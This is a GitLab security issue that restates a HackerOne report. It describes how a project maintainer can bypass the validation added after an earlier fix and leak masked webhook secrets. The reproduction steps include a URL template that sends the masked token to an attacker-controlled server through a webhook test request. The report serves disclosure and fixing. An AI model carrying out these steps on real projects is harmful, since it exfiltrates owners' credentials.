Skip to content

Maintainer can leak masked webhook secrets by adding a new parameter to the webhook URL to bypass the newly added validation logic

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1871136 by 0xn3va on 2023-02-12, assigned to @rshambhuni:

Report | Attachments | How To Reproduce

Report

Summary

There is a vulnerability #385118 (closed) that was fixed and disclosed recently. The fix adds an extra check in case the URL changes:

###  https://gitlab.com/gitlab-org/gitlab/-/commit/7f34991ae36f1804610ba9980e31191394c8b208

###  ...

  before_validation :reset_url_variables, unless: ->(hook) { hook.is_a?(ServiceHook) }  
 
###  ...

  def reset_url_variables  
    self.url_variables = {} if url_changed? && !encrypted_url_variables_changed?  
  end

However, reset_url_variables will return false if the URL variables have also been changed. This allows bypassing the check by adding a new variable to the modified URL.

Steps to reproduce

As a project owner

  1. Create a project
  2. Add another user to the project as a maintainer
  3. Go to Settings > Webhooks
  4. Put the URL https://example.com?token=secret-token
  5. Click to add a mask
  6. Add the value secret-token with the replacement TOKEN
  7. Click save for the webhook

As a maintaner

  1. Open the project
  2. Go to Settings > Webhooks
  3. Click edit on the webhook
  4. Edit the URL to your controlled server like that: https://<ATTACKER_SERVER>?token={TOKEN}&a=aaaaa
  5. Add the value aaaaa with the replacement A
  6. Save the webhook
  7. Now click Test to send a request
  8. Check your server logs; it will contain the secret in plain text
Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

What is the current bug behavior?

Adding or deleting a new secret does not reset the previously saved ones

What is the expected correct behavior?

Adding or deleting a new secret resets the previously saved ones

Relevant logs and/or screenshots

Screen_Recording_2023-02-12_at_12.55.50.mov

Output of checks

This bug happens on GitLab.com

Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: